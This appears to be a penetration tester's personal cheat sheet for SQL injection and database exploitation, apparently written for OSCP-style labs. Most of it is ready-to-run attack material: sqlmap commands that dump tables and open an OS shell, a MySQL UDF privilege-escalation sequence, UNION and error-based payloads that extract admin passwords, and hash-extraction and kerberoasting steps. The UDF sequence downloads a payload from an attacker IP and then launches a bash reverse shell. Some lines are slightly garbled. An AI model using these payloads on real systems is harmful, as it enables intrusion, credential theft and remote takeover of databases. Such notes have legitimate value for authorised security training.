SQL & SQL Injection
All commands listed here assumes you have a command prompt…
All listed items are separate commands unless otherwise specified…
RESOURCES TO USE DURING TESTING
…this is a MSSQL Practical Injection cheat sheet
…this is another SQL injection sheet
…this is a list of escape characters
…there are plenty more online
CONNECT TO SQL SERVER
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
mysql -u user -p password
mysql -u user -p password -h host
QUICKLY SAVE A QUERY THROUGH BURPSUITE
…NOTE… this is not usable on an OSCP exam
http://ip.com/whatever.php?id=1
INTERCEPT WITH BURP - NO FORWARD
RIGHT CLICK AND HIT 'SAVE ITEM'
USE SQLMAP WITH SAVED ITEM
sqlmap -r <file> --banner (takes a while to run)
sqlmap -r <file> --users
sqlmap -r <file> --is-dba
sqlmap -r <file> --dbs
sqlmap -r <file> -D <db> --tables --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --hex --threads=10 (sometime it shows more)
sqlmap -r <file> -D <db> -T <table> --columns --dump --threads=10
sqlmap -r <file> -D <db> -T <table> --columns --dump --force-pivoting --threads=10
RUN FOR ALL TABLES AND COLUMNS
sqlmap -r <file> -D ecomerce -T user --columns --dump --force-pivoting --threads=10
TRY A SYSTEM SHELL
sqlmap -r mssql --os-shell --threads 10
os-shell> whoami
MYSQL ENUMERATION
…requires credentials
mysql --host=127.0.0.1 --port=13306 --user=wp -p
MariaDB [(none)]> SHOW Grants;
MariaDB [(none)]> show varping iables;
MYSQL EXPLOIT
… creates function within mysql, then executes command using root
# GRAB THE EXPLOIT TO COMPILE
git clone https://github.com/1N3/PrivEsc.git
gcc -m32 -g -c raptor_udf2.c
gcc -m32 -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
ls
lib_mysqludf_sys_0.0.3.tar.gz raptor_udf2.c raptor_udf2.o raptor_udf2.so raptor_udf.c
# ON TARGET MAKE A DIRECTORY /tmp/tmp
mkdir /tmp/tmp
cd /tmp/tmp
wget http://192.168.119.299:443/raptor_udf2.so
cp raptor_udf2.so raptor.so
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/tmp/tmp/raptor.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/raptor.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function do_system returns integer soname 'raptor.so';
Query OK, 0 rows affected, 1 warning (0.00 sec)
mysql> select * from mysql.func;
+-----------+-----+-----------+----------+
| name | ret | dl | type |
+-----------+-----+-----------+----------+
| do_system | 2 | raptor.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)
mysql> select do_system('bash -i >& /dev/tcp/192.168.119.299/80 0>&1');
CREDENTIAL LOCATIONS
… may be able to find files with credentials
… here are a couple common ones
# PLAIN TEXT DIRECTORY STRUCTURE
C:Program FilesMicrosoft SQL ServerMSSQL14.SQLEXPRESSMSSQLTemplate Datamaster.mdf
# OLDER NT DIRECTORY STRUCTURE
C:\PROGRA~1\MICROS~2\MSSQL1~1.SQL\MSSQL\Binn\Templates\master.mdf
# SAME OLDER STRUCTURE
PROGRA~1MICROS~2MSSQL1~1.SQLMSSQLBinnTemplatesmaster.mdf
# POWERSHELL - RETRIEVE HASHES
Add-Type -Path 'OrcaMDF.RawCore.dll'
Add-Type -Path 'OrcaMDF.Framework.dll'
import-module .Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:UsersadminDesktopmaster.mdf"
# IF THE FILE IS IN USE, ONLY BACKUPS CAN BE USED FOR THIS
# HASHCAT MODULE
-m 1731
# CREATE HASHCAT READABLE HASH
Invoke-Kerberoast -outputformat hashcat | fl
hashcat -m 13100
SQL INJECTION QUERIES
… these are just a few common ones
… here and here and here are more (just google it)
# HAD TO FIND THE NUMBER OF COLUMNS
# FIND WHICH COULD BE USED FOR INJECTION
# ORACLE
# VERSION
admin' or 1=1 union select (select banner from v$version where rownum=1),null,null from dual--
# DB NAME
admin' or 1=1 union select global_name,null,null from global_name--
# TABLE NAME
admin' or 1=1 union select table_name,null,null from all_tables--
# COLUMNS
admin' or 1=1 union select column_name,null,null from all_tab_columns where table_name='user_table'--
# LOOT
admin' or 1=1 union SELECT username FROM all_users--
admin' or 1=1 union SELECT username,null,null FROM all_users--
admin' or 1=1 union SELECT name FROM sys.user$--
admin' or 1=1 union SELECT column_name FROM all_tab_columns WHERE table_name = WEB_ADMINS--
admin' or 1=1 union SELECT column_name,null,null FROM all_tab_columns WHERE table_name = 'WEB_ADMINS'--
admin' or 1=1 union SELECT PASSWORD,null,null FROM WEB_ADMINS--
# USED TWO COLUMNS TO SEE USER / HASH
admin' or 1=1 union SELECT PASSWORD,ADMIN_NAME,null FROM WEB_ADMINS--
# MSSQL
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--
# MONGODB
condition=aaa';shellcode=unescape...
db.my_collection.find({'$where':'shellcode=unescape....
# THIS GOT REDICULOUS... NEED TO LEARN MORE
# MSSQL (REDICULOUS!)
# syntax is [server].[database].[schema].[table]
',convert(int,db_name(6))--
',convert(int,(select+top+1+table_name+from+archive.information_schema.tables)))--
',convert(int,(select+top+1+username+from+users)))--
',convert(int,(SELECT TOP 1 COLUMN_NAME FROM archive.information_schema.columns)))--
',CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 alogin FROM (SELECT top 1 alogin FROM archive..pmanager ORDER BY alogin ASC) sq ORDER BY alogin DESC)+CHAR(58)+CHAR(58))))--
SQL INJECTION BASIC STRATEGY EXPLAINED
… this is the reference for may of the commands below
# THE ',convert(int,( )))-- IS USED AS A CLIPBOARD... PUT INQUIRY INSIDE
# FIND DATABASE NAMES
convert(int,db_name())--
# OBTAIN TABLE NAMES
select+top+1+table_name+from+information_schema.tables
',convert(int,( )))--
# LOOK FOR SECOND TABLE BASE OFF OF PREVIOUS RESULTS
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads')
',convert(int,( )))--
# AND FOR ANOTHER TABLE BASED OFF OF PREVIOUS RESULTS... TILL THERE ARE NO MORE
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('threads','users')
',convert(int,( )))--
RECORD DELETED = NO MORE DATABASES
# NEXT TARGET COLUMNS
select+top+1+column_name+from+information_schema.columns+where+table_name='users'
',convert(int,( )))--
# SECOND COLUMN OF THE TABLE WE FOUND
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname')
',convert(int,( )))--
# CONTINUE UNTIL RECORD HAS BEEN DELETED = LAST COLUMN
select+top+1+column_name+from+information_schema.columns+where+table_name='users'+and+column_name+not+in+('uname','upass')
',convert(int,( )))--
# GETTING THE DATA - SAME METHOD USING TABLE AND COLUMN
select+top+1+uname+from+users
',convert(int,( )))--
# SECOND VALUE AND SO ON
select+top+1+uname+from+users+where+uname+not+in+('admin')
',convert(int,( )))--
# THIRD VALUE AND SO ON TILL RECORD DELETED = LAST VALUE
select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')
',convert(int,( )))--